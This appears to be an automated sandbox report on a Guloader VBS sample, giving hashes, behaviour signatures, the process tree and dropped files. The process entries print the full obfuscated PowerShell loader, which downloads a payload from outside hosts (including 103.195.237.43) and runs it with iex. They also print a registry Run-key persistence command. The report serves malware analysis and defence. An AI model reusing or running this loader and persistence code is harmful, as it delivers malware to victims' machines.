Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    10/07/2024, 18:51

General

  • Target

    e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764.vbs

  • Size

    102KB

  • MD5

    b7967a2db392f9d8694734c554f06183

  • SHA1

    0386c4437465eb5bd4c6a21938e99af3c9f748c7

  • SHA256

    e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764

  • SHA512

    89223646bfb92ccf336c539f82fbab7f4e0cb35aab0779631702319504590947480338443f991500b6e3044d4d3c3cef30b45558f8382fa05e9a780426e1e8e5

  • SSDEEP

    3072:h4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvvNZ:2t7SPReHd0WoT28faa+CS64mu8IQCtvn

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233 Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233';If (${host}.CurrentCulture) {$Ophthalmology++;}Function Irksome244($Albuebenenes){$Loto=$Albuebenenes.Length-$Ophthalmology;$Mytologiernes='SUBsTR';$Mytologiernes+='ing';For( $Tilkbenes=1;$Tilkbenes -lt $Loto;$Tilkbenes+=2){$Pariaers+=$Albuebenenes.$Mytologiernes.Invoke( $Tilkbenes, $Ophthalmology);}$Pariaers;}function lineable($Capito){ & ($Rverbanders) ($Capito);}$Proreptilian=Irksome244 ' M o z i.lFlAaF/N5 ..0 S(CW iOnSd,o,w.s, DNBT P1K0 .P0 ;, ,WFi.n 6 4 ;. .x 6 4 ;s r vK:N1,2 1 .V0G). FG,eNcTk o / 2.0E1,0.0 1 0F1S ,F i r,e f,oYxP/P1 2 1H..0S ';$Avenida=Irksome244 ' UKsVe r,- ACgSeAn tP ';$Blidhedens114=Irksome244 'Hh t.tUp.sU: /./BmLial a nkaAc,eTsA. cUoDm./.S,eLr,o s.a,.,m i.x.>Bh tct p s :B/R/.m o,vDike s mDa,cAk taa,lNk ..cDo mP/ S.eArgo s a,. mfi,x > h t tEp s : /n/DfSiSr s tO4.l oTc.kasum.i t h,sP. cIo .,u k,/KSDe,r oFs a..CmUi xA> hUt tSpU:,/K/ 1,0P3m.C1 9R5 ..2H3A7 .,4,3 /.S eCr o s aP..mPiTxS ';$Torqueses=Irksome244 ' >D ';$Rverbanders=Irksome244 '.iTeux, ';$razoring='Unpendant';$Scribblage = Irksome244 ' e.c h o V%KaHp pAd a tUa %d\BKAu bRi kDc e n.tni m eUt e.r ..GTuaa ,&.&T Ne.c hToM Ct ';lineable (Irksome244 'M$.gFlCoTbDaEl :.IGn,tLe.r f r.e tNtme ds=K(KcVmSd. ,/.ck $SS.c r iMbSbMlsa gBeG) ');lineable (Irksome244 'L$PgAl oUbTaulA:ISBa.lEp eLtSeVr,sUy rveRf aTbkr i.kSk ednM2A0 5,= $SB,lKiFd h e d,eCnGs 1 1 4b.cs p.l,i,t (.$RT ogrFqru eTs,e sF)L ');lineable (Irksome244 'b[ N.e t.. Sge r v iScDe.P oCiSnStFMFa,n,aHg e,rG],: :FSMe,c uSr.i tGyUP,rMo t o.c oPl P=D B[PNTe,t .aSRe cUuSr i tSyIPOrpo.t oBc.oAlHTmy p eD] : :UT lBsb1R2U ');$Blidhedens114=$Salpetersyrefabrikken205[0];$Carmelite= (Irksome244 'N$ gml oKb a lB:MMIe,t a l ukd l sOe,r.e = NReIwS-.O.b jSe c t ,STy sBt e m .FN eTt .EWFe bUC,lpiSebn t');$Carmelite+=$Interfretted[1];lineable ($Carmelite);lineable (Irksome244 ',$,M eStMaFlRuTdSlDsPe r e,.,HNeWaMd e r s [H$ A v eun ied,aT] =,$SPTrAoMr eFp t iBl,i aPnO ');$Saxten=Irksome244 'B$ M eLtEa l uIdYlis e,r eM.FD oSw nSl.o,a.d F iSlse ( $UBUlTi,dTh.e.dRe n,s,1S1G4 , $ F lDi.c k.eCrMe.d ), ';$Flickered=$Interfretted[0];lineable (Irksome244 ',$,gDlmoabRaSl,:,GCr.a,nAoapAhDyTrseB= (lT eTs,tM-,P a t h P$OFelCi c k e r e dB)N ');while (!$Granophyre) {lineable (Irksome244 ' $Dg l o.b a.l : rMe vKo,l,uGt iRoInssAr.a a dFeAnceZ=P$.tGr,uMe ') ;lineable $Saxten;lineable (Irksome244 '.S t,aErFt.- SSl e,e pr D4, ');lineable (Irksome244 'B$Ug,l.o.bPaLl.: GCr aSnCo p hBy r.e,=S(ATKeJs t -SPSa t hA .$,F,l i.c,kFe.rFeLd,) ') ;lineable (Irksome244 'M$ gSlIoSb a lP: F,rUg,e.mFnPd sS=I$fg,lAoHbNaBll:cSPl v.f.a d.e,n eF+ + %.$FS a l p.eUtSeurTsCyLrOeHf.aHb rBiEkPk.e nS2G0G5..Sc o.uVn t ') ;$Blidhedens114=$Salpetersyrefabrikken205[$Frgemnds];}$Kriminologernes=339584;$Resummoned84=26675;lineable (Irksome244 'M$Mg lMo.b a,lS: B.e,sAt i aBlGi t.e tSeRrA =E GBeAtD-ACMo n.t eEn t O$ FAl i c,k,eNrKe dM ');lineable (Irksome244 'B$ g l oAb,aOlR:DW,a v.e mMe n tW .=. U[ S yTs.tReKm .,C o nBv eArNtP]P:.: FPr,oBm BPa sAe 6R4 S t,r isn g (t$SB,eCs tSiCa,l iHt eTt.e.rM) ');lineable (Irksome244 'A$ g l o,bZaFl.:IEVn dFkSkEe rPnFe =, ,[HSSyls tLe mB.STSeSxTt,.PE n,c oBd iSn g ]P:R:PAUSMCUI I .,GBe,tUS t,r,i n.gP(P$ W a.vCe mTe n.t ) ');lineable (Irksome244 '.$ gPlTo bAaJlC:HCQhSoNu,t.=S$,E nMd kTkGe,r,n e ..sSuab s t rUi nEg ( $BKKrNi m iPnSo,lloPgSe,rSn,ePs ,H$ RLe.sHukm m oLnDeKd,8,4 ) ');lineable $Chout;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2868
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t"
        3⤵
          PID:2964
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233 Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233';If (${host}.CurrentCulture) {$Ophthalmology++;}Function Irksome244($Albuebenenes){$Loto=$Albuebenenes.Length-$Ophthalmology;$Mytologiernes='SUBsTR';$Mytologiernes+='ing';For( $Tilkbenes=1;$Tilkbenes -lt $Loto;$Tilkbenes+=2){$Pariaers+=$Albuebenenes.$Mytologiernes.Invoke( $Tilkbenes, $Ophthalmology);}$Pariaers;}function lineable($Capito){ & ($Rverbanders) ($Capito);}$Proreptilian=Irksome244 ' M o z i.lFlAaF/N5 ..0 S(CW iOnSd,o,w.s, DNBT P1K0 .P0 ;, ,WFi.n 6 4 ;. .x 6 4 ;s r vK:N1,2 1 .V0G). FG,eNcTk o / 2.0E1,0.0 1 0F1S ,F i r,e f,oYxP/P1 2 1H..0S ';$Avenida=Irksome244 ' UKsVe r,- ACgSeAn tP ';$Blidhedens114=Irksome244 'Hh t.tUp.sU: /./BmLial a nkaAc,eTsA. cUoDm./.S,eLr,o s.a,.,m i.x.>Bh tct p s :B/R/.m o,vDike s mDa,cAk taa,lNk ..cDo mP/ S.eArgo s a,. mfi,x > h t tEp s : /n/DfSiSr s tO4.l oTc.kasum.i t h,sP. cIo .,u k,/KSDe,r oFs a..CmUi xA> hUt tSpU:,/K/ 1,0P3m.C1 9R5 ..2H3A7 .,4,3 /.S eCr o s aP..mPiTxS ';$Torqueses=Irksome244 ' >D ';$Rverbanders=Irksome244 '.iTeux, ';$razoring='Unpendant';$Scribblage = Irksome244 ' e.c h o V%KaHp pAd a tUa %d\BKAu bRi kDc e n.tni m eUt e.r ..GTuaa ,&.&T Ne.c hToM Ct ';lineable (Irksome244 'M$.gFlCoTbDaEl :.IGn,tLe.r f r.e tNtme ds=K(KcVmSd. ,/.ck $SS.c r iMbSbMlsa gBeG) ');lineable (Irksome244 'L$PgAl oUbTaulA:ISBa.lEp eLtSeVr,sUy rveRf aTbkr i.kSk ednM2A0 5,= $SB,lKiFd h e d,eCnGs 1 1 4b.cs p.l,i,t (.$RT ogrFqru eTs,e sF)L ');lineable (Irksome244 'b[ N.e t.. Sge r v iScDe.P oCiSnStFMFa,n,aHg e,rG],: :FSMe,c uSr.i tGyUP,rMo t o.c oPl P=D B[PNTe,t .aSRe cUuSr i tSyIPOrpo.t oBc.oAlHTmy p eD] : :UT lBsb1R2U ');$Blidhedens114=$Salpetersyrefabrikken205[0];$Carmelite= (Irksome244 'N$ gml oKb a lB:MMIe,t a l ukd l sOe,r.e = NReIwS-.O.b jSe c t ,STy sBt e m .FN eTt .EWFe bUC,lpiSebn t');$Carmelite+=$Interfretted[1];lineable ($Carmelite);lineable (Irksome244 ',$,M eStMaFlRuTdSlDsPe r e,.,HNeWaMd e r s [H$ A v eun ied,aT] =,$SPTrAoMr eFp t iBl,i aPnO ');$Saxten=Irksome244 'B$ M eLtEa l uIdYlis e,r eM.FD oSw nSl.o,a.d F iSlse ( $UBUlTi,dTh.e.dRe n,s,1S1G4 , $ F lDi.c k.eCrMe.d ), ';$Flickered=$Interfretted[0];lineable (Irksome244 ',$,gDlmoabRaSl,:,GCr.a,nAoapAhDyTrseB= (lT eTs,tM-,P a t h P$OFelCi c k e r e dB)N ');while (!$Granophyre) {lineable (Irksome244 ' $Dg l o.b a.l : rMe vKo,l,uGt iRoInssAr.a a dFeAnceZ=P$.tGr,uMe ') ;lineable $Saxten;lineable (Irksome244 '.S t,aErFt.- SSl e,e pr D4, ');lineable (Irksome244 'B$Ug,l.o.bPaLl.: GCr aSnCo p hBy r.e,=S(ATKeJs t -SPSa t hA .$,F,l i.c,kFe.rFeLd,) ') ;lineable (Irksome244 'M$ gSlIoSb a lP: F,rUg,e.mFnPd sS=I$fg,lAoHbNaBll:cSPl v.f.a d.e,n eF+ + %.$FS a l p.eUtSeurTsCyLrOeHf.aHb rBiEkPk.e nS2G0G5..Sc o.uVn t ') ;$Blidhedens114=$Salpetersyrefabrikken205[$Frgemnds];}$Kriminologernes=339584;$Resummoned84=26675;lineable (Irksome244 'M$Mg lMo.b a,lS: B.e,sAt i aBlGi t.e tSeRrA =E GBeAtD-ACMo n.t eEn t O$ FAl i c,k,eNrKe dM ');lineable (Irksome244 'B$ g l oAb,aOlR:DW,a v.e mMe n tW .=. U[ S yTs.tReKm .,C o nBv eArNtP]P:.: FPr,oBm BPa sAe 6R4 S t,r isn g (t$SB,eCs tSiCa,l iHt eTt.e.rM) ');lineable (Irksome244 'A$ g l o,bZaFl.:IEVn dFkSkEe rPnFe =, ,[HSSyls tLe mB.STSeSxTt,.PE n,c oBd iSn g ]P:R:PAUSMCUI I .,GBe,tUS t,r,i n.gP(P$ W a.vCe mTe n.t ) ');lineable (Irksome244 '.$ gPlTo bAaJlC:HCQhSoNu,t.=S$,E nMd kTkGe,r,n e ..sSuab s t rUi nEg ( $BKKrNi m iPnSo,lloPgSe,rSn,ePs ,H$ RLe.sHukm m oLnDeKd,8,4 ) ');lineable $Chout;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1912
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t"
            4⤵
              PID:1704
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:2904
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2012
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2700

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        304B

        MD5

        2ccb5a319e2c8513494c4166f8d2f151

        SHA1

        d733aebf1fc158b347709b98242ae02ac036137d

        SHA256

        13c5a09459c0163d57ab2398642351da9561822015ff22fa0ec9cc87003ee6f4

        SHA512

        a7e4191d78a15c78dec124ebff92f43a61ecedaf48be6099fbf07be80da6fdb514934360112806fbc3dbfaeaea7ddae7d749c407205e9eff92b0b7c7a902e37e

      • C:\Users\Admin\AppData\Local\Temp\CabB618.tmp

        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      • C:\Users\Admin\AppData\Local\Temp\Tar7179.tmp

        Filesize

        181KB

        MD5

        4ea6026cf93ec6338144661bf1202cd1

        SHA1

        a1dec9044f750ad887935a01430bf49322fbdcb7

        SHA256

        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

        SHA512

        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      • C:\Users\Admin\AppData\Roaming\Kubikcentimeter.Gua

        Filesize

        476KB

        MD5

        8fc3031fccbd90ac8beb25c3ce089816

        SHA1

        95e5412e39afc737103ab2e516642e9952c366e9

        SHA256

        7ab6a49072545cc0f6da993333894c81fee597e41129379d30c3b4f249667343

        SHA512

        8852b4efe8f23c6c01b0a500eacb1d8ce38426516da706435addd641cd1b32d024109f1d6a123b9672f173362caae707f87dbb2a8f32ec3325d3a9e5bd43f11b

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2EYELF70ZCQVGQ1NKRDN.temp

        Filesize

        7KB

        MD5

        8a1f7c92871872a53279dfd05fc28b3a

        SHA1

        5173de01af6ff673971bc02adae1e043a6cddf2c

        SHA256

        1f6aa7ba34d12d399fabb2dfd58af676b2b6d51dc62684965b15c62050e69379

        SHA512

        d15643ced1f52eee9441b3e315ed1306278890e66a532e833d193d55191489f8c7c29d39eb6448b530daf6371c88b365f1fb107f4b4d96176d8936773a097467

      • memory/1912-34-0x00000000065D0000-0x000000000B624000-memory.dmp

        Filesize

        80.3MB

      • memory/2868-25-0x000007FEF60F0000-0x000007FEF6A8D000-memory.dmp

        Filesize

        9.6MB

      • memory/2868-26-0x000007FEF60F0000-0x000007FEF6A8D000-memory.dmp

        Filesize

        9.6MB

      • memory/2868-24-0x000007FEF60F0000-0x000007FEF6A8D000-memory.dmp

        Filesize

        9.6MB

      • memory/2868-23-0x000007FEF60F0000-0x000007FEF6A8D000-memory.dmp

        Filesize

        9.6MB

      • memory/2868-32-0x000007FEF60F0000-0x000007FEF6A8D000-memory.dmp

        Filesize

        9.6MB

      • memory/2868-33-0x000007FEF63AE000-0x000007FEF63AF000-memory.dmp

        Filesize

        4KB

      • memory/2868-22-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

        Filesize

        32KB

      • memory/2868-21-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

        Filesize

        2.9MB

      • memory/2868-20-0x000007FEF63AE000-0x000007FEF63AF000-memory.dmp

        Filesize

        4KB

      • memory/2868-57-0x000007FEF60F0000-0x000007FEF6A8D000-memory.dmp

        Filesize

        9.6MB

      • memory/2904-37-0x0000000000B10000-0x0000000001B72000-memory.dmp

        Filesize

        16.4MB

      • memory/2904-54-0x0000000001B80000-0x0000000006BD4000-memory.dmp

        Filesize

        80.3MB